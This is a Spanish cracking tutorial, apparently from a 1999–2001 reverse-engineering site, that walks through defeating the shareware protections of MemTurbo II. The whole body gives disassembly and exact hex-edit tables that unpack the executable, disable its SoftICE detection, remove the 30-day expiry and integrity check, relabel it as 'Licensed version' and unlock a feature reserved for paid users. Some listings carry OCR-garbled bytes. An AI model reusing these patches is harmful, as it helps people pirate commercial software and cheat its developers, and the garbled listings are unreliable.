Como siempre, quiero recordaros que debéis pagar los programas que utilicéis regularmente. No estaría bien que 
condenarais al hambre a unas buenas gentes, mientras vosotros os gastáis el dinero a manos llenas en actividades 
viciosas y de más que dudosa moralidad ;-) 


Por último, quiero agradecer a ByTESCRK su colaboración en este tuto y enviar un saludo a mis amigos Act Mago, 
PrfEsOr X, DeK_OIiN, Karpoff, Silver Storm, KuaTo_ThoR, y vLuGo. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


MEMTURBO II 


Empakado, Anti-Sice, CRC-32, Limitación de uso a 30 días. 
Fragmentar MemTurbo. 

Recuperar RAM ocupada inútilmente por Windows. 
Avanzadillo. 

http://www.memturbo.com 


Softice 3.24, FrogSice, Procdump32, File insPEctor XL, W32dasm 8.9, ExeScope v6.00, un 
editor Hex. 


Arkanian FECHA: 01/09/2001 


INTRODUCCION 


Esta nueva versión de MemTurbo trae un montón de novedades en cuanto a nuestro campo de investigación 
se refiere. Así como la versión anterior, la 1.5, venía a "pelo", parece que los chicos de Shareware 
OnLine.com , Inc. han espabilado y han intentado hacer las cosas un poco mejor. 


Estas son las dificultades que nos vamos a encontrar: 


1. .- Programa empakado/comprimido y anti-dasm. 
2. .- Anti-Sice mediante Meltlce, BoundsChecker y llamadas a la INT3. 

.- Comprobaciones de integridad del archivo aleatorias durante la ejecución del programa. 
3. .- Encriptación de las cadenas de texto "delicadas". 


Interesante programa a fe mía, amigo Sancho... 


Vamos alla... 


"Per aspera ad astra" 


AL ATAKE 


Instalar el programa y lo primero es lo primero, la talla XL del File insPEctor, Compilador UPX 1.05-1.07, un vistazo 
a las secciones y a sus características, rápidamente Procdump y cambiamos la UPXO a E0000020 por si las moscas, de 
paso nos apuntamos el Entry Point y el Size of Image que nunca viene mal. Le echamos un vistazo a las funciones solo 
por curiosidad y ejecutamos el memturbo.exe. 


PRIMERAS SORPRESAS 


Iniciamos el programa y empiezan las sorpresas, pantallazo del Sice, no se qué del Windows requested break point, 
fallo de página, fallo general de protección y cuelgue de la maquina todo seguido. R- EXIT-C por este orden. 
Empezamos bien .... |:-( 


Al montar FrogSice nos encontramos con otra sorpresa, un aviso de modificaciones en la IDT. Algo ha tocado la Tabla 
de Descripción de Interrupciones y el Sice no funciona. El Loader dice que está activo pero es incapaz de cargar nada. 
Reiniciando que es gerundio... 


FrogSice y a ver que pasa... 


=> Memturbo 
** SOFTICE DETECTION ** code 0B, at cs:00404852 
Attempting to load: SICE (string ref at cs:0044D404) 


Esto de aquí arriba aparece 9 veces seguidas en el log del FrogSice. Tiene pintas de Meltlce. Parece que el programa 
funciona y que tenemos el Sice convenientemente oculto. Como uno nació desconfiado vamos a ver que ocurre con la 
opción "a prueba de balas": 


=> Memturbo 
** SOFTICE DETECTION ** code 0B, at cs:00404852 
Attempting to load: SICE (string ref at cs:0044D404) 


=> Memturbo 

** SOFTICE DETECTION ** code 01, at 0177:0040497C 
Interrupt:03h >eax=006C0004h ebx=0000044Ch ecx=006CF954h 
edx=BFF76859h esi=0121C290h edi=00000000h >ebp=4243484Bh 


SEH proc address at cs:0041A18C 


=> Memturbo 

** SOFTICE DETECTION ** code 00, at 0177:004049C8 
Interrupt:03h eax=0040038Fh ebx=0000044Ch ecx=006CF954h 
edx=BFF76859h esi=01211227h edi=00000000h ebp=006CF7DCh 


SEH proc address at cs:0041A18C 


=> Memturbo 

** SOFTICE DETECTION ** code 00, at 0177:004049C8 
Interrupt:03h eax=0040038Fh ebx=0000044Ch ecx=006CF954h 
edx=00000000h esi=01211227h edi=00000000h ebp=006CF768h 


SEH proc address at cs:0041A18C 


¡Toma pedazo de log!, todo esto vuelve a aparecer otras nueve veces seguidas. Vamos a analizarlo a ver que sacamos 
en claro: 


.- Attempting to load: SICE --> El truco Meltlce, por lo menos parte de él... ya veremos. 

.- > ebp = 4243484Bh --> BCHK. BoundsChecker seguido de una INT3. 

.- Interrupt: 03h --> Lo mismo que el anterior, intenta acceder a la INT3 dos veces antes de probar 
Meltice otra vez. y empezar el bucle. 


Nada fuera de nuestras posibilidades. :-) 


AL TAJO 


Desempakando a pedales 


Vamos a probar primero a desempacar el programa, siendo UPX no creo que haya mucha dificultad. Hemos cambiado 
las características de la sección UPXO, de E0000080 a E0000020 lo cargamos en el Loader y cuando rompa ponemos 
un BPX GETVERSION. 


ES y F12, hasta aparecer en una dirección 41 y pico, miramos un poco más arriba para encontrar un PUSH EBP - 
MOV EBP, ESP en 417860. Ya tenemos el Punto de entrada original. borramos el bp y ponemos otro en esa dirección. 
Salimos, quitamos el FrogSice, volvemos al Loader, FS y directamente a 417860 


Lo de siempre, quitar el bp, apuntar los bytes (558BEC6A), ensamblar a JMP EIP, Procdump, Dump full y Kill task, 
Hex editor, buscar E9FE, poner los bytes originales (558B), Procdump otra vez, cambiar el Entry Point a 00017860 y 
reconstruir la cabecera. El XL ya lo identifica como C++ v.6 y Tabla de Importaciones parece correcta... 


Eh... ¿Voy muy deprisa? 


Anti-debugging a mano 


Ya tenemos un ejecutable funcional, hora de cambiar cosas. Vamos a buscar las direcciones "calientes" en 00404852, 
0040497C y 004049C8. Como se puede comprobar una vez desensamblado con W32dasm, no hay informaciones de 
menús, ni de diálogos, ni de funciones ni de nada de nada y las String References parecen un bebedero de patos. 


El motivo de esto es parte de las strings del programa vienen en formato ancho en plan VB, ...eso las que no están 
encriptadas, otras en formato normal y las que quedan no sirven para mucho... Usaremos el ExeScope para ver por 
donde andamos. 


A lo que íbamos, echemos un vistazo a esto: 


* Referenced by a CALL at Addresses: 

1:0040462C , :00409AFC , :0040BABE , :0040BB81 , :0040BC6C 
1:0040BD3E , :0040BDA2, :0040BEDS , :0040BF5E , :0040BFC9 
1:0040C05D , :0040C140, :0040C1AE 

| 

:00404813 6408 push 00000008 --> Número de bytes a desencriptar. 
:00404815 59 pop ecx --> ECX = 8 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040482B(C) 


| 

:00404816 8A9104D44400 mov dl, byte ptr [ecx+0044D404] --> Un valor encriptado. 

:0040481C 8D8104D44400 lea eax, dword ptr [ecx+0044D404] --> Ponemos en EAX 44D404 + 8. 
:00404822 F6D2 not dl --> Poderosa técnica de encriptación. 

:00404824 8810 mov byte ptr [eax], dl --> Lo movemos al valor de EAX. 

:00404826 8BC1 mov eax, ecx --> El contador a EAX. 

:00404828 49 dec ecx --> Decrementa el contador. 

:00404829 85CO0 test eax, eax --> Comprobación del contador. 

:0040482B 7FE9 jg 00404816 --> Volvemos arriba. 


Aquí lo que va haciendo es desencriptar los valores de 44D404+8 hacia atrás. Poco a poco va apareciendo la cadena WM 
. YSICE. Observad la cantidad de sitios desde donde se llama a este código, la cantidad de comprobaciones que hace, 
...inutilmente. Seguimos: 


:0040482D 53 push ebx --> Guarda estos valores. 

:0040482E 55 push ebp 

:0040482F 56 push esi 

:00404830 8B3534C24300 mov esi, dword ptr [0043C234] --> La dirección de CreateFileA. 
:00404836 57 push edi 

:00404837 BB80000000 mov ebx, 00000080 

:0040483C 6A00 push 00000000 --> Nos vamos a haciendo hueco... 

:0040483E 53 push ebx 

:0040483F 6A03 push 00000003 --> Hum.... 

:00404841 6A00 push 00000000 --> Más espacio vital... 


:00404843 BF000000CO mov edi, CO0O0000O --> ¿Y esto?, ¿0028:C00000007. La cosa se pone caliente. 
:00404848 6A03 push 00000003 

:0040484A 57 push edi 

:0040484B 6803D44400 push 0044D404 --> Guarda la dirección de la cadena YA .A SICE. 

:00404850 FFD6 call esi --> Entramos en CreateFileA. 

:00404852 6A08 push 00000008 --> ¿Otra vez?, ¿Encriptamos o desencriptamos? 

:00404854 59 pop ecx --> El contador.. 


Ahora tendría que venir la comprobación de si ha encontrado el archivo... hay que esperar un poco, la cosa tiene miga: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040486B(C) 

| 

:00404855 8A9104D44400 mov dl, byte ptr [ecx+0044D404] --> La dirección de antes. 
:0040485B 8DA904D44400 lea ebp, dword ptr [ecx+0044D404] --> Ahora en EBP. 
:00404861 F6D2 not dl --> Encriptamos con la poderosa tecnología NOT. 
:00404863 885500 mov byte ptr [ebp+00], dl --> Y lo guardamos. 

:00404866 8BD1 mov edx, ecx --> El contador [8]. 

:00404868 49 dec ecx --> Un byte menos. 

:00404869 85D2 test edx, edx --> Comrpueba si esta todo. 

:0040486B 7FES jg 00404855 --> Arriba si no es 0. 

:0040486D 83F8FF cmp eax, FEFEFFFE --> ¡Por fin! 

:00404870 7403 je 00404875 --> El salto de marras... 

:00404872 50 push eax 

:00404873 EB4D jmp 004048C2 --> Si llegamos aquí la jodimos... 


Esto es un ejemplo de la mayoría de los procesos del programa, desencripta las cadenas de texto que va a utilizar, hace 
lo que tenga que hacer y antes de acabar las vuelve a encriptar. 


Para no aburriros mucho, ya que es duro leerse el código, la siguiente comprobación que hace un poco más abajo, 
usando este mismo código, la hace con11. NICE. ¡Que bonito!. 


¿NICE no debería ser NTICE?, ¿Han ajustado la cadena al valor fijo de ECX que es 8?, Me parece que "alguien" ha 
metido la pata con esto. :-))) 


Vamos a liquidar esto de una manera elegante. Nada de cambiar saltos que es lo fácil, pensemos un poco, el resultado 
después de CreateFileA tiene que ser FFFFFFFF en EAX, la dirección de la cadena 11. |SICE la ha metido en la pila 
antes de entrar en esa función, (PUSH 44D404), una pequeña modificación nos permitirá salir con el valor de error 
esperado por el programa casi automáticamente. 


El valor de 44D403 es 00 (un byte antes), CreateFileA empieza a procesar una cadena que empieza con 00, como lo 
hace con un REPNZ salimos con un -1 en EAX rápidamente. Así que cambiamos PUSH 44D404 por PUSH 44D403 
(04 x 03). Fácil, ¿No?. 


Vamos con la siguiente dificultad, el BCHK: 


:0040496C 8965E8 mov dword ptr [ebp-18], esp 

:0040496F 8365FC00 and dword ptr [ebp-04], 00000000 

:00404973 BD4B484342 mov ebp, 4243484B --> Valor de la cadena BCHK. 
:00404978 66B80400 mov ax, 0004 --> Cambiar a JMP 0. 

:0040497C CC int 03 --> La putada. 

:0040497D 3C04 cmp al, 04 

:0040497F 7515 ¡ne 00404996 


Aquí la solución es ensamblar la linea 404978 mov ax, 0004 a JMP 0, de esta manera se produce una excepción y el 
programa pensará que no hay ningún Debugger que la maneje. 


De la misma forma solucionamos la última dificultad de la INT 3 en 4049C8: 


:004049B9 8965F0 mov dword ptr [ebp-10], esp 
:004049BC 8365FC00 and dword ptr [ebp-04], 00000000 
:004049C0 66BE2712 mov si, 1227 


:004049C4 66B88F03 mov ax, 038F --> Ensamblar esto a JMP 0. 
:004049C8 CC int 03 
:004049C9 EB16 ¡mp 004049E1 


Espero que hayas tomado nota de todos los cambios que hemos realizado, ahora toca ir al editor Hex y realizar las 
oportunas modificaciones: 


| DIRECCIÓN | OFFSET | VALOR | CAMBIARA 
| :0040484B |  00003E48 | 6804D444 | 6803D444 


:00404978 00003F78 | 66 B8 04 00 CC | * E9 83 B6 BF BF 
| :004049C4 00003FC4 66B88F03CC | E9 37 B6 BF FF 


[*] A mi también me extraña que el desplazamiento sea 83 B6 BF ¿BF? y no FF como el de abajo, pero así lo puso el Sice 
después de meter a mano el JMP 0. De todas formas funciona que es lo que queríamos. 


La fecha de caducidad 


Ya hemos "liberado" el programa y ya podemos dedicarnos a investigar tranquilamente cuando y donde hace la 
comprobación de tiempo transcurrido hasta que caduca. 


Sabemos de antemano, por que uno lee y se considera instruido, que el programa calcula el tiempo transcurrido a 
traves de una serie de comprobaciones en el Registro (vease, Karpoff - MemTurbo v1.5 - WKT Tutorialz Site - 1 de 
Diciembre de 1999), pero de algún sitio tendrá que coger la fecha actual, digo yo... 


Así que que por probar que no quede, le metemos un BPX GETSYSTEMTIME después de cargarlo en el Loader a ver 
que pasa. 


Esto: 


:0040BF23 FF1524C34300 call dword ptr [0043C324] --> Llamada a GetSystemTime. 
:0040BF29 8D45C8 lea eax, dword ptr [ebp-38] --> Aparecemos aquí. 

:0040BF2C 50 push eax 

:0040BF2D 8D45A0 lea eax, dword ptr [ebp-60] 

:0040BF30 50 push eax 

:0040BF31 FF1528C34300 call dword ptr [0043C328] --> Llamada a SystemTimeToFileTime 
:0040BF37 8D45C8 lea eax, dword ptr [ebp-38] 

:0040BF3A 50 push eax 

:0040BF3B 8D45CO0 lea eax, dword ptr [ebp-40] 

:0040BF3E 50 push eax 

:0040BF3F FF152CC34300 call dword ptr [0043C32C] --> LLamada a CompareFileTime. 
:0040BF45 85CO0 test eax, eax 

:0040BF47 7E6B jle 0040BFB4 

:0040BF49 833D18DD44001E cmp dword ptr [0044DD18], 0000001E --> Un cebo... ni caso. 
:0040BF50 7407 je 0040BFS59 --> ¡No tocar! 

:0040BF52 56 push esi 

:0040BF53 56 push esi 

:0040BF54 E82BB50000 call 00417484 --> A Kernel32!RaiseException. Este es nuevo. 
:0040BF59 E84A8AFFFF call 004049A8 --> Comprobación de la INT 3. 

:0040BF5E ESB088FFEFF call 00404813 --> Comprobación del Meltlce. 

:0040BF63 85CO0 test eax, eax 

:0040BF65 7512 ¡ne 0040BF79 

a sigue y sigue 


Y el código sigue y sigue más o menos igual dando vueltas y más vueltas sobre lo mismo. Podemos encontrar la 
comparación con 1E y el mismo código de arriba en 40BFBF, 40C048, 40C128, 40C199. En realidad la comparación y 
el salto posterior no hacen nada más que mandarnos a las rutinas Anti-Sice. 


Si invertimos el salto vamos a RaiseException con el consiguiente cuelgue y si lo dejamos vamos donde "estaba" la 
INT3. Y vuelta para arriba y vuelta para abajo. Como ya hemos liquidado las rutinas Anti-Sice podemos seguir 
trazando tranquilamente. 


Bien, si echamos un vistazo hacia arriba veremos que todo esto empieza en 40BAJE, el código se repite hasta 40C20F 
que es donde está el RET. Entretanto y más o menos escondido podemos encontrar cosas curiosas como esta: 


e :0040BAFF 8A9030DD4400 mov dl, byte ptr [eax+0044DD30] --> Algo encriptado. 
:0040BBOS5 32D1 xor dl, cl --> Xorea el valor con el número de caracteres [3F]. 
:0040BB07 80F272 xor dl, 72 --> El resultado xoreado con 72. 

:0040BBOA 49 dec ecx --> Abajo el contador para el siguiente xoreo... 

:0040BB0B 889020054500 mov byte ptr [eax+00450520], dl --> Lo ponemos en su sitio. 
:0040BB11 40 inc eax --> Siguiente valor. 

:0040BB 12 3BCE cmp ecx, esi --> Comprobación del contador. 

:0040BB 14 75E9 ¡ne OO40BAFE --> Volvemos arriba. 


Que es la desencriptación de la siguiente cadena de texto correspondiente a la Clave del Registro: 
HKEY_CURRENT_USERWSoftwarelMicrosofA WindowsWCurrentVersionExplorerDataViewSettings 


Acto seguido lo completa con -2RC1 y llama a RegOpenKeyExA. Luego la vuelve a encriptar nada más salir de un 
RegQueryValueExA, hay varias encriptaciones y desencriptaciones de diversas claves del Registro a lo largo de ese 
fragmento de código. Como cosa curiosa vemos la incorporación de varios valores fijos como son 07, 09 y 13 que 
tienen su importancia. 


La comprobación de la fecha se hace después de una larga manipulación del valor de las cadenas DataViewSettings- 
2RC1 y DataViewStream-2RC1. Los resultados válidos sólo pueden ser uno de esos tres (07, 09, 13). Dependiendo de 
cual sea, llegamos al RET, salimos y nos encontramos con esto: 


:00409B35 ES6EAEFFFF call 004049A8 --> Otra llamadita más a la INT 3, sin problemas... 
:00409B3A E85F1F0000 call 0040BADE --> Venimos de aquí. 

:00409B3F 83F807 cmp eax, 00000007 --> Tiempo OK. 

:00409B42 0F8494000000 je 00409BDB --> Este es el bueno. 

:00409B48 83F809 cmp eax, 00000009 --> ¡MemTurbo expires soon!. Creo que sale a los 20 días. 
:00409B4B 7462 je 0O409BAF --> A la ventana de aviso de "quedan pocos días". 

:00409B4D 83F813 cmp eax, 00000013 --> Memturbo ha caducado... Gracias por probar el programa, 
:00409B50 7424 je 00409B76 --> A pasar por caja... 


Creo que no hay que decir cual hay que cambiar. E9 94 00 00 00 90 es el nuevo valor de 409B42. 


CUESTIONES ESTÉTICAS - DE CAZA POR LA PILA 


Hagamos un pequeño paréntesis... Siempre suelo dejar para el final la tarea de maquillar el programa para que parezca 
la versión integra. Cambiar las referencias a Shareware, cambiar el menú About, etc. Pero en este caso vamos ha 
hacerlo ahora para hacer más comprensible como cazar la comprobación del CRC. 


Si echamos un vistazo al programa con el ExeScope veremos que está TODO. Y con "todo" me refiero a cosas como 
esta: 


32809,MemTurbo II 

32810,Licensed Version 

32811,Evaluation Copy 

32812,%s, Serial No. MT-39601$0AThis program is licensed for use on a single computer.$0APlease do not distribute 
this copy! $0AThank-you for registering! 

32813,%s$0AThis product may be evaluated for 30 days, after which it must be purchased or uninstalled. Continued use 
beyond this period without a license is illegal. 

61707,System registry entries have been removed and the INI file (if any) was deleted. 

** This is the LICENSED version of MemTurbo. Please do not illegally redistribute! 


Licensed version, Evaluation, un número de Serie, una referencia a un archivo .ini (¿memturbo.ini?), This is the 
LICENSED ... que viene en el diálogo About pero en el programa no aparece. 


Lamentablemente no hay un diálogo en plan "Enter Registration Code", pero esta misma cadena si que aparece por 
algún lado con el Sice.(en 44DE18 concretamente), ¿? 


¿Como modificamos el horrible "Evaluation Copy" de la ventana de inicio del programa?, podríamos cambiar con el 
editor Hex la referencia a Evaluation y poner algo así como Registered que tiene el mismo número de caracteres y 
queda bonito, pero ya que tenemos el Licensed vamos a cambiar uno por otro. 


¿Donde carga el programa el dichoso Evaluation?. Al Loader de nuevo. 


Veamos... C++... a ver.... BPPX LOADSTRINGA, ...el primero no, con el segundo ya tenemos la carátula y el nombre 
del programa, con el tercero la versión y con el cuarto se carga el "Evaluation copy'"'. Después de seguirle la pista que 
ha ido dejando por la pila te dire que hay un PUSH 0000802B que es el responsable del desaguisado. 


Este aparentemente inofensivo valor es el encargado de mostrar la cadena "Evaluation copy". El procedimiento es el 
siguiente, se guarda 802B en la pila, damos un montón de vueltas arriba y abajo por el código para despistar, al rato 
entramos en LOADSTRINGA y seguimos avanzando hasta la función Kernel32!/0RD_000E: 


call Kernel32!LoadResource --> Salimos de aquí con una dirección de la sección rsrc en EAX [48ED48] 
test eax,eax --> Comprobación. 

mov [ebp-04], edi --> Una dirección OOG6CFXXX. 

and dword ptr [ebp+0C], OF --> ¡AQUI! 802B and OF = B 

movzx ecx, word ptr [eax] 

mov [ebp-1C], ecx 

add eax, 02 --> Ajustamos EAX a la posición en la que aparece el texto. 
mov edx, [ebp+0C] --> Hay que joderse, es un contador... [B] 

dec dword ptr, [ebp+0C] --> Empieza la cuenta... 

test edx, edx --> La comprobación. 

jz BFF80C61--> Saltamos a un loop hasta que EDX sea 0. 


Aquí ha metido en EAX una dirección de la sección rsrc, luego mete en [ebp-04] una dirección de memoria 6CFXXX 
que va ser usada como paso intermedio, obtiene mediante al AND OF un valor que va ser usado como contador del 
bucle y vamos sumando 2 a EAX hasta que EDX (B) sea 0, cuando EDX alcanza ese valor la cadena que se va a usar 
es la que aparece en la dirección que marca EAX (Evaluation Copy). 


Si cambiamos el PUSH 0000802B por PUSH 0000802A, el valor que se va a cargar es el inmediatamente superior 
(EDX = A --> EAX = Licensed version). 


La cosa no ha acabado, una vez que salimos al código real del programa tenemos en 6CFXXX la cadena Evaluation 
copy, la mueve a otra dirección (0126664, este dato es fijo), establece un byte de control y borra el valor de 6CFXXX. 
¡Buff! 

¡ 


Si lo hacemos de nuevo vemos que solo paramos una vez en LOADSTRINGA ya que el programa comprueba el byte 
de control (hay una comprobación con código diferente para cadena de texto que se carga) y si lo encuentra nos manda 


directamente a la dirección 0126664 sin pasar por el bp que habiamos puesto, ¡Joder!. 


Todo lo anterior nos va a servir para cazar la comprobación del CRC que también tiene historia... :-) 


Comprobación de la Integridad del Archivo 


Esto también tiene su historia, porque la ventana de aviso de archivo corrupto no aparece siempre, te puedes pegar 20 
minutos seguidos dandole al botón de Recover now y no pasa nada, otra vez aparece a la primera o a los cinco minutos 
o incluso no aparece en toda la tarde, ¿?. Pero una vez que aparece el programa deja de funcionar y la ventana sale una 
y otra vez como una maldición.. 


Como ya sabemos donde mirar, esperamos que aparezca la ventana, metemos un BPX LOADSTRINGA e intentamos 
recuperar memoria, esta vez saltamos rápido al SICE. Trazamos , le ponemos un bp a la instrucción AND DWORD 
PTR [EBP+0C], OF y vamos tomando nota de los valores que va tomando el [ebp+0C] hasta que se carga la cadena 


"Your memturbo binary appears corrupt...”. El valor es 8018, metemos un comando de búsqueda: 


S 0 LFFFFFFFF 68 18 80 00 00 
Pattern found at 00406F3B (00406F3B) --> Solo hay uno en el rango de memoria de memturbo. 


68 es el valor de PUSH, este es el código donde aparece: 


:00406F2D E8E3200200 call 00429015 

:00406F32 84DB test bl, bl 

:00406F34 5B pop ebx 

:00406F35 740E je 00406F45 --> Un hermoso salto. 
:00406F37 6AFF push FFFFFFFF 

:00406F39 6A00 push 00000000 

:00406F3B 6818800000 push 00008018 --> AQUÍ 
:00406F40 E8B37B0200 call 0042EAF8 


La primera reacción es modificar el salto, pero no sirve de nada, ya que lo único que hacemos con esto es que no 
aparezca la ventana, sin embargo el programa deja igualmente de funcionar. 


Sigamos con la caza, este código que incluye PUSH 00008018 empieza en 406EBD y tiene todas las pintas de un call 
ya que la instrucción inmediatamente superior es un RET. Pero de un call con truco, veamos: 


:00407198 53 push ebx --> Inicio del bucle. 
:00407199 53 push ebx 

:0040719A 53 push ebx 

:0040719B 8D45BC lea eax, dword ptr [ebp-44] 
:0040719E 53 push ebx 

:0040719F 50 push eax 

:004071A0 FF1550C54300 call dword ptr [0043C550] --> Llamada a la función PeekMessage. 
:004071A6 85CO0 test eax, eax 

:004071A8 741A je 004071C4 --> Salto importante. 
:004071AA E895E40200 call 00435644 

:004071AF 8B4004 mov eax, dword ptr [eax+04] 
:004071B2 8BC8 mov ecx, eax 

:004071B4 8B10 mov edx, dword ptr [eax] 

:004071B6 FF525C call [edx+5C] --> Al programa... 
:004071B9 85C0 test eax, eax 

:004071BB 75DB jne 00407198 --> Fin del Bucle. 
:004071BD 53 push ebx 

:004071BE FF1554C54300 call dword ptr [0043C554] 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:004071A8(C) 


| 
:004071C4 6800400000 push 00004000 --> Llegamos aquí. 


:004071C9 6A08 push 00000008 

:004071CB FF7SEC push [ebp-14] 

:004071CE A130D54400 mov eax, dword ptr [0044D530] --> ¡Aquí está!. 
:004071D3 FFDO call eax --> Este es el call maldito. 

:004071D5 3BC3 cmp eax, ebx 

:004071D7 7431 je 00407204 

:004071D9 8D8800400000 lea ecx, dword ptr [eax+00004000] 


Estamos contemplando el "backbone" del programa, espinazo en cristiano, todos los procesos del mismo pasan por 
aquí. El valor de EAX depués de PeekMessage es el que decide si se salta o no y la dirección de la llamada [call EAX] 
la dedice el valor de 44D530. Si ese valor es 407005 el programa se desarrolla perfectamente, si el valor es 406EBD 
vamos al mensaje de error. 


Sería demasiado largo explicar como va a parar 406EBD a 44D530 y porqué la aparición de este valor tiene un 
componente aleatorio, en este proceso intervienen GetTickCount, la fecha del system.ini (creo) ¿?, un montón de 
valores fijos que trae el programa y una larga serie de operaciones matemáticas que, si todo va mal, nos llevan a este 
código: 


:0040C253 3B45EC cmp eax, dword ptr [ebp-14] 


:0040C256 59 pop ecx 

:0040C257 59 pop ecx 

:0040C258 740A je 0040C264 

:0040C25A C70530D54400BD6E4000 mov dword ptr [0044D530], 00406EBD --> Estamos jodidos. 


Podríamos parchear el salto en 400258 pero por alguna razón esto cuelga la máquina, por lo visto al llegar a ese salto 
el proceso está tan avanzado que es inevitable que el valor 406EBD vaya a 44D530. 


Así que la derecha es hacer que en 4071D3 CALL EAX siempre se llame a 407005. Y esto lo hacemos modificando en 
4071CE la instrucción MOV EAX, DWORD PTR [0044D530] por MOV EAX, 00407005. 


Estos son los cambios a realizar con el editor Hex: 


DIRECCION OFFSET VALOR CAMBIAR A 


[— :00409B42 | 00009142 |0F8494000000 |E99400 00 00 90 
| :0040CFBO |  0000C5B0 |  682B80 |  682A80 
| :00407ICE | 000067CE | A130D544 | B8057040 


Nota 


Si "quemas" el programa adelantando el reloj para ver si los cambios funcionan y luego vuelves el reloj a su fecha, 
aparecerá una molesta ventanita avisando que has cambiado la fecha etc. Esto se soluciona rápidamente borrando las dos 
Claves del Registro mencionadas arriba. También se le puede meter mano al código. El push fatídico está entre 40BA9E y 
40C20F, suerte. :-) 


ESTO NO HA TERMINADO 


La verdad es que pensaba acabar aquí, pero me jode un montón dejar la ventana de "Cache Tuning" deshabilitada y 
con el aviso "de esta ventana solo funciona en la versión buena”. Así que ponte cómodo que todavía queda un rato. 


Habilitando ventanas 


Veamos, para que una ventana funcione y con que funcione me refiero a que reciba entradas de teclado o de ratón se 
utiliza la función Enable Window que tiene la siguiente forma: 


BOOL EnableWindow 
HWND hWnd, 11 el manipulador de ventana 
BOOL bEnable 1/ la bandera para validar o desactivar la entrada 


Bien, vamos a ver un pequeño ejemplo, iniciamos el programa, vamos al Sice, ponemos un BPPX ENABLEWINDOW 
y hacemos click, por ejemplo, en la pestaña Options, aterrizamos aquí después de salir de la función: 


:00428760 FF742404 push [esp+04] --> El Flag para activar o desactivar la ventana. 
:00428764 FF711C push [ecx+1C] --> El manipulador o handle. 

:00428767 FF152CC64300 call dword ptr, [0043C62C] --> LLamada a Enable Window. 
:0042876D EBOE ¡mp 004287D --> Salimos aquí. 


El flag lo tenemos fácil, 1 - Activado, O - Desactivado. Pero tenemos dos problemas, el primero es identificar la 
ventana Cache Tuning y el segundo cual es su manipulador. 


El primer problema lo solucionamos con ExeScope, vamos al Dialog 106, la ventana que queremos habilitar tiene 
cuatro controles msctls_trackbar32: Sliderl que son controles deslizantes que definen el tamaño máximo de la caché, 
el mínimo, el tamaño de los bloques y una cosa rara que se llama ASync IO Buffers. Debemos apuntar también cuales 
son y cual es el número de los elementos restantes. (Un Button y 19 referencias a Static) 


Una vez que sabemos esto vamos al Sice y hacemos un HWND MEMTURBO para buscar donde están esos controles, 
el manipulador es el valor de la columna de la izquierda cuyo encabezado es Window handle. Ojo que cada vez que se 
inica el programa son diferentes por eso hemos identificado los elementos característicos de la ventana para saber 
donde empieza y donde acaba. 


Al Loader de nuevo, ¿Cuando se carga la ventana de Cache Tuning? ... Ponemos un BPPX ENABLEWINDOW, vamos 
dandole alegremente al FS y cada vez que salte el bp metemos un HWND MEMTURBO para ver si ya están cargados 
los controles msctls_trackbar32 y cuando les toca ser procesados por EnableWindow. Observamos que siempre 
aparecemos en la dirección del ejemplo de arriba. 


Pues no aparecen, por lo menos en el código donde se carga el resto, me temo que vuelve a haber gato encerrado... 
efectivamente: 


:004016F2 6A02 push 00000002 --> Principio. 
:004016F4 FF731C push [ebx+1C] 

:004016F7 FFDS call ebp 

:004016F9 50 push eax 

:004016FA E890420200 call 0042598F 

:004016FF 8BD8 mov ebx, eax 

:00401701 3BDE cmp ebx, esi 

:00401703 740A je 0040170F --> Este es el responsable. 
:00401705 56 push esi 

:00401706 8BCB mov ecx, ebx 

:00401708 ES4C700200 call 00428759 --> Bucle de EnableWindow para cargar las ventanas 
:0040170D EBE3 ¡mp 004016F2 --> Fin. 


Lo gracioso es que para cuando llegamos aquí las ventanas del programa ya están cargadas, todas menos la que nos 
interesa, se puede ver con un HWND. Así que esto o es código redundante o estamos a punto de soltar al gato. 


Veamos si con un G 40170F pasa algo, saltamos a 40170F y seguimos avanzando, a la salida de uno de los numerosos 
call's que encontramos vemos con HWND que ya tenemos cargados los controles, despacio.... hasta aquí: 


:0040186B 6A00 push 00000000 

:0040186D 6866060000 push 00000666 --> ¿El número de la Bestia? 
:00401872 53 push ebx 

:00401873 FF701C push [eax+1C] 

:00401876 FFDÉ call esi 

:00401878 8BCF mov ecx, edi 

:0040187A ES5DFCFFFF call 004014DC --> Entramos aquí. 
:0040187F 6A01 push 00000001 


Entramos en call 004014DC y seguimos avanzando despacio, por lo que parece la ventana del Cache Tuning se carga 
aparte, estamos buscando exáctamente una llamada a Enable Window y también buscamos cuando el valor de esp+04 
se pone a 0. 


Después de algunas pruebas, esto no siempre sale a la primera, encontramos que la dirección que marca esp+04 es 
006CE908 y que es siempre la misma, así que nos ponemos una ventana de control con esa dirección (DEX 3 
6CE908), seguimos y ... 


:0040151D 3BF8 cmp edi, eax 

:0040151F 74DD je 004014FE 

:00401521 6A00 push 00000000 --> ¡El Flag! 

:00401523 8BCF mov ecx, edi 

:00401525 E82F720200 call 00428759 --> A EnableWindow. 
:0040152A EBD2 ¡mp 004014FE 


Pues esto es lo que hay... cambiamos el PUSH 00000000 por PUSH 00000001, entramos en el call 428759 y vamos 
controlando los handler que el programa va cargando en ECX+1C, comprobando sucesivamente con HWND 
MEMTURBO y D ECX+1C que efectivamente corresponden a los elementos de nuestra ventana: 


:00428760 FF742404 push [esp+04] --> El Flag siempre va a ser 1. 
:00428764 FF711C push [ecx+1C] --> Controlamos que este valor corresponda a nuestra ventana. 


:00428767 FF152CC64300 call dword ptr, [0043C62C] --> LLamada a Enable Window. 
:0042876D EBOE ¡mp 004287D --> Nos vamos... 


No vamos a tener ningún problema, el valor de ECX+1C siempre corresponde al handler de los elementos de nuestra 
ventana. El programa carga las otras ventanas en el bucle 4016F2 - 40170D y luego sigue hasta 401521 donde el valor 


del Flag se pone a O para procesar la ventana del Cache Tuning. 


El último cambio con el editor Hex: 


DIRECCION OFFSET VALOR CAMBIAR A 


| :00401521 |  00000B21 | 6A 00 | 6A 01 


FINAL 


